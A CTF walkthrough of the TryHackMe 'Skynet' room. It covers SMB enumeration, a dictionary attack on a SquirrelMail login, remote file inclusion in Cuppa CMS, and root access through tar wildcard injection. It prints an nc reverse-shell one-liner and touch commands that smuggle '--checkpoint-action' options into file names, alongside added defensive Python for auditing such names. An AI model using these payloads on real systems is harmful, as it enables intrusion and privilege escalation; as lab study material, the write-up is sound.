Date: 03/04/2022
Difficulty: Easy
CTF: https://tryhackme.com/room/skynet
A vulnerable Terminator themed Linux machine.
What is Miles password for his emails?
First things first, let’s do a quick scan:
The machine answers our ping. As the TTL is 63, we can guess it is a Linux machine (as the description says).
nmap discovered several open ports. Let’s get more info about them:
Let’s see what the webserver has:
The landing page looks like a search engine (a copy of Google, to be more exact).
The source code of the page doesn’t reveal anything like a credential.
I checked whether a robots.txt file exists, but it doesn’t. I also tried searching for some words, with no success. The site didn’t set any cookie or load any script.
Let’s proceed with the directory & files enumeration.
gobuster found some directories we do not have access to: all of the discovered ones except one return a forbidden status (403).
Let’s see what’s inside /squirrelmail:
There is nothing in the source code we can use. I’m pretty sure we’ll be using this login form later.
I’m going to check if the webpage is vulnerable to XSS:
Nope, nothing happens.
Let’s capture the request with Burp Suite and see if there is something interesting in it:
Apparently it doesn’t matter what you try to search for; it always sends the submit parameter with the value “Skynet+Search”.
Let’s try changing it and sending the value “Admin”… just to try something:
Same result as before. This seems to be a dead end.
Let’s take a look at the nmap results again…
Dovecot imapd is an IMAP server (used for email), and it looks like it advertises some capabilities such as LoginDisable and Pre-login… it sounds strange.
According to HackTricks:
We have connected to the Dovecot service, but I have no idea what I can do here… Apparently nothing without logging in, so let’s move on to the next thing.
There is an SMB server exposed on port 445; let’s see what we can access without credentials:
xdg-open smb://10.10.208.14
As anonymous, the only share we have access to is “anonymous”:
We found a text file with a message from Miles Dyson and a folder with 3 files:
Only one of them has any content, and it looks like a password list. I’m going to save it.
It would be funny if Miles Dyson’s password were in this list, as he sent a message asking all users to change their passwords… I have to check it.
To do it I’ll use hydra, with milesdyson as the username and log1.txt as the password wordlist:
Nope. I also tried SSH and IMAP, with the same results.
Oh, the SquirrelMail login page… maybe it will work there? As the wordlist is not that large, I’ll try a dictionary attack using Burp Suite:
First of all, let’s intercept a login request:
Send the request to intruder, configure it…
And Start the attack!
After a few minutes the attack finishes. Looking at the length of the responses, every request except one has a length of 3240, which probably indicates that the login failed. Let’s try to log in using the password that produced the response with the different length:
Yeah! We’re in!
What is the hidden directory?
Before anything else, let’s take a look at the emails:
A strange email from serenakkogan; anyway, I’ll take note of the text just in case:
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
Same as before, it’s pretty strange, but this time it is clearly recognizable as binary, so let’s convert it to something readable:
balls have zero to me to me to me to me to me to me to me to me to
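Decoding that message programmatically, as an added example that is not part of the original write-up: BINARY_EMAIL is a copy of the email text above, and the decoder tolerates line wrapping but rejects anything that is not a clean 8-bit group.

```python
# Added example, not from the original write-up: decode the space-separated
# 8-bit groups of the email into text. BINARY_EMAIL is a copy of that message.
BINARY_EMAIL = """
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
"""


def decode_binary_groups(text):
    """Turn whitespace-separated 8-bit binary groups into a string.

    Line breaks are ignored, so a message wrapped across several lines decodes
    as one string. A group that is not exactly eight 0/1 digits raises
    ValueError instead of silently producing garbage.
    """
    chars = []
    for group in text.split():
        if len(group) != 8 or group.strip("01"):
            raise ValueError(f"not an 8-bit group: {group!r}")
        chars.append(chr(int(group, 2)))
    return "".join(chars)


if __name__ == "__main__":
    print(decode_binary_groups(BINARY_EMAIL))
```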
Ok… Let’s move on
This one is interesting: it includes this user’s new password for the Samba service.
I checked the Drafts, Sent and Trash folders but there was nothing there.
With these credentials, let’s try to log in to the Samba share:
Logged in! The password is correct.
The file important.txt looks… important:
I think we have found the hidden directory!
Yep we did!
What is the vulnerability called when you can include a remote file for malicious purposes?
Remote file inclusion
What is the user flag?
Let’s run a directory scan on the newly found folder:
Gobuster quickly discovers the /administrator directory; let’s look at what’s inside:
The CMS used is something called Cuppa… Let’s look for any exploitable vulnerability.
Yes, apparently there is one that allows us to do remote file inclusion, nice:
Apparently we can start an HTTP server on our machine, hosting a PHP reverse shell that the target will fetch and execute… Let’s try:
After the HTTP server is set up, we have to navigate to:
And we get a reverse shell, awesome!
What is the root flag?
The first thing to try is whether we can cd /root:
Nope.
Well, as we will be interacting with this console, let’s first see if we can find some SSH credentials; if not, we’ll have to stabilize the shell:
No SSH credentials, time to stabilize it:
Done. Now let’s look for something we can use to escalate privileges.
passwd is readable, but shadow is not.
As we don’t know the password of the www-data user, we cannot list which commands we can run with sudo.
There is a script executed every minute as root, and it lives in the /home/milesdyson/backups folder.
Let’s see if we have write permissions there:
Nope, we don’t.
Let’s try to log in as milesdyson using the password found earlier with Burp Suite:
Yeah, it worked.
This user cannot enter /root either.
And cannot change the script either… let’s see if we can execute something using sudo:
Nothing. Meh… let’s use linPEAS, I’m out of ideas.
linPEAS didn’t help me this time and I had to read another write-up… Apparently we can use the backup.sh script: it creates a backup of a directory using tar, and there is a tar wildcard weakness we can take advantage of (https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
So, we had to execute this code (as the www-data user):
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
Open a netcat listener and wait for the root console:
Aaaand done.
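As an added defensive counterpart, not part of the original write-up or the room: the root cron job was exploitable only because a shell wildcard let file names reach tar as options, so this shows how an admin could audit a web root for option-shaped names and how the backup could be built with Python’s tarfile, which takes paths as data and never parses them. The sample directory, its file names and the function names are my own.

```python
# Added example, not from the original write-up: detect and avoid the tar
# wildcard problem a root cron job like backup.sh runs into with `tar cf x.tgz *`.
import os
import tarfile
import tempfile


def option_like_names(directory):
    """Return entries of `directory` whose names start with '-': the shape a
    shell glob would hand to tar as an option rather than as a file to archive."""
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def safe_backup(directory, archive_path):
    """Archive every entry of `directory` into a gzip tarball with no shell
    wildcard involved; tarfile stores '--checkpoint=1' as an ordinary member.
    Returns the member names read back from the finished archive."""
    with tarfile.open(archive_path, "w:gz") as tar:
        for name in sorted(os.listdir(directory)):
            tar.add(os.path.join(directory, name), arcname=name)
    with tarfile.open(archive_path, "r:gz") as tar:
        return sorted(tar.getnames())


def make_sample_dir():
    """Constructed sample web root: one normal file plus one option-shaped name
    (the kind of planted file an audit of the backed-up directory should flag)."""
    directory = tempfile.mkdtemp(prefix="webroot-")
    for name in ("index.html", "--checkpoint=1"):
        with open(os.path.join(directory, name), "w") as fh:
            fh.write("sample\n")
    return directory


if __name__ == "__main__":
    root = make_sample_dir()
    print("option-like names found:", option_like_names(root))
    print("archived members:", safe_backup(root, root + ".tgz"))
```

Running the audit from the same cron job before the archive step, and alerting on a non-empty result, turns the planted file names into a detection instead of a privilege escalation.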